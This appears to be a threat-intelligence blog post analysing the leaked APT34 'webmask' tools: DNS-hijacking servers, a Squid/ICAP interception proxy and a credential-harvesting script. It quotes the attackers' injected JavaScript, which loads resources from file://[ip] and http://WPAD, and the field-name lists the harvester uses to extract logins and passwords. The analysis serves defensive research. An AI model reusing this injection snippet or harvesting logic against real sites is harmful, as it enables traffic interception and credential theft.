Today I’d like to share a quick analysis on the webmask project standing behind the DNS attacks implemented by APT34. Thanks to the leaked source code is now possible to check APT34 implementations and techniques.

Context:

Since at least 2014, an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran. The group conducts operations primarily in the Middle East, targeting financial, government, energy, chemical, telecommunications and other industries. Repeated targeting of Middle Eastern financial, energy and government organisations leads FireEye to assess that those sectors are a primary concern of APT34. The use of infrastructure tied to Iranian operations, timing and alignment with the national interests of Iran also lead FireEye to assess that APT34 acts on behalf of the Iranian government. (Source: MISP Project).

On April 19 2019 researchers at Chronicle, a security company owned by Google’s parent company, Alphabet, have examined the leaked tools, exfiltrated the past week on a Telegram channel, and confirmed that they are indeed the same ones used by the OilRig attackers. OilRig has been connected to a number of intrusions at companies and government agencies across the Middle East and Asia, including technology firms, telecom companies, and even gaming companies. Whoever is leaking the toolset also has been dumping information about the victims OilRig has targeted, as well as data identifying some of the servers the group uses in its attacks.

According to Duo, OilRig delivered Trojans that use DNS tunneling for command and control in attacks since at least May 2016. Since May 2016, the threat group has introduced new tools using different tunneling protocols to their tool set” Robert Falcone of Palo Alto Networks’ Unit 42 research team wrote in an analysis of the group’s activities.

“Regardless of the tool, all of the DNS tunneling protocols use DNS queries to resolve specially crafted subdomains to transmit data to the C2 and the answers to these queries to receive data from the C2.”

Leaked Source code

The initial leaked source code sees three main folders: webmask, poisonfrog and Webshells_and_Panel. While webmask and poisonfrog seems to be single projects, the folder Webshells_and_Panel looks like wrapping more projects into a single bucket. But, for today, let’s focus on webmask.

WEBMask Focus

The webmask project, in my personal opinion, is an APT34 distinction since implementing their DNS attack core. APT34 is well-known to widely use DNS Hijacking in order to redirect victims to attackers websites. So let’s see what they’ve implemented so far on this direction.

The webmask project comes with both: a guide (guide.txt) and an installation script (install.sh). From the latter we might appreciate the NodeJS installed version which happens to be 6.X. This version was released on 2016-04-26 for the first time. Nowadays is still on development track as the name of “Boron”. According to the NodeJS historic versioning that project could not be dated before April 2016 since Nodejs_6.x was not existing before that date. The guide.txt file suggests two solutions (this is the used term) both of them base their ‘core engine’ on a developed DNS server, used as authoritative name servers to respond crafted ‘A’ records to specific requests. The attackers suggest to use solution2 (they write “use this” directly on configuration file), the one who implements DNS server in NodeJS language. On the other side the Solution1 uses python as DNS server. The following image shows the suggested Solution.

APT34: WebMask Project Suggested Solution

Some domain names and some IPs are used as configuration example. Personally I always find interesting to see the attacker suggested examples, since they lets a marked flavour of her. That time the attacker used some target artefacts (IP and DNS) belonging to ‘Arab Emirates’ net space while she used as a responsive artefact (the one used to attack) an IP address belonging to a NovinVPS service.

The guide follows on describing the setup of ICAP proxy server, used to proxy the victims to the real destination but trapping the entire connections. The attacker suggests Squid3 and guides the operator to install and to configure it. She uses as ICAP handler a simple python script placed into icap/icap.py folder. This script has been developed in order to log and to modify the ICAP/connection flow coming from squid3 proxy. Then a well-known Haproxy is used as High Availability service for assuring connections and finally certbot (Let’s Encrypt) is used to give valid certificate to squid3 (but it’s not a mandatory neither a suggested step).

DNS Server scripts

In the folder dns-redir 3 files are placed. A configuration file called config.json is used by dnsd.py. The python script implements a class named MyUDPHandler which is given to the native SocketServer.UDPServer and used as UDP handler. The script overrides only DNS A records if included into the overrides object (variable at the beginning of source code). In other words if the DNS request is an A record and if the requested name belongs to specific domain name, the script responds with the attacker IP address. The following image shows the main 3 steps of the override chain.

DNSD.py: Three steps DNS overriding chain

According to the guide.txt the suggested solution wont be the dnsd.py, but the attacker would prefer the dnsd.js script. This script appears not externally configurable (it does not import config.json) so if you want to configure it you need to manually edit the script source code. The source is written in an classic style ECMAScript without any fancy or new operators/features introduced in ECMAScript6 and ECMAScript7. The dnsd.js performs the same tasks performed by dnsd.py without any specific change.

ICAP script

In the icap folder a python script called icap.py is placed. This script handles ICAP flows coming from squid3, extracts desired informations and injects tracking pixels. The python script implements a ThreadingSimpleServer as an implementation of SocketServer.ThreadingMixIn which is a native framework for multi-threading Network servers. SocketServer.ThreadingMixIn needs a local address and local port to be spawned and a BaseICAPRequestHandler class as second parameter in order to handle ICAP flows. The attacker specialised that class by referring to the general ICAPHandler. Aims of the script is to log into separated files the following information: credentials, cookies, injected files and headers. It silently injects a tracking pixel into communications by adding the following javascript to HTML body.

script = ';$(document).ready(function(){$(\'<img src="file://[ip]/resource/logo.jpg"><img src="http://WPAD/avatar.jpg">\');});'

If the parsed request is a HTTP POST the ICAPHandler tries to extract credentials through special function called: extract_login_password. The following image shows the process flow of the credential extraction.

ICAP.py: Credential Extraction Process

It would be interesting, at least in my point of view, to check the used patterns as login detection. For example the parsing function looks for the following “form names”:

logins = ['login', 'log-in', 'log_in', 'signin', 'sign-in', 'logon', 'log-on']

It also looks for the following user field names:

userfields = ['log','login', 'wpname', 'ahd_username', 'unickname', 'nickname', 'user', 'user_name','alias', 'pseudo', 'email', 'username', '_username', 'userid', 'form_loginname', 'loginname',
 'login_id', 'loginid', 'session_key', 'sessionkey', 'pop_login', 'uid', 'id', 'user_id', 'screename', 'uname', 'ulogin', 'acctname', 'account', 'member', 'mailaddress', 'membername', 'login_username', 'login_email', 'loginusername', 'loginemail', 'uin', 'sign-in', 'usuario']

and finally it also looks for the following password fields names:

passfields = ['ahd_password', 'pass', 'password', '_password', 'passwd', 'session_password', 'sessionpassword', 'login_password', 'loginpassword', 'form_pw', 'pw', 'userpassword', 'pwd', 'upassword', 'login_password','passwort', 'passwrd', 'wppassword', 'upasswd','senha','contrasena', 'secret']

Interesting to see specific string patterns such as (but not limited to): form_pw, ahd_password, upassword, senha, contrasena, which are quite indicative to victim scenarios. For example strings such as: senha, contrasena,usuario, and so on seems to be related to”Spanish” / “Portuguese” words. So if it’s true (and google translate agrees with me) it looks like APT34 are proxying some connections that might have those username and password fields, which might refer to “Spanish”/”Portuguese” targets. But this is only a Hypothesis.

The icap.py is able to intercept basic authentication headers, cookies and general headers as well, implementing similar functions able to extract interesting information and eventually to modify them if needed. I wont describe every single functions but one of the most interesting function that is worth of being showed is the inject_RESPMOD which injects a tracking image into the ICAP flow. The following image shows the attacker’s implementation of the Injection_RESPMOD function.

ICAP.py: script injection function

The injected script is added to the HTML body and eventually is GZipped and shipped back. In such a way the attacker tracks who is landing to the target domain.

Interesting points

  • WebMask is >= April 2016 (From Installed Dependencies)
  • APT34 might target ‘Arab Emirate’ (From examples into config files)
  • APT34 might target Spanish/Portuguese (From code into the extract_login_password function )
  • APT34 might use NovinVPS (From examples into config files)
  • APT34 needs credentials for change Authoritative DNS (From guide.txt)

2 thoughts on “ APT34: webmask project ”

Comments are closed.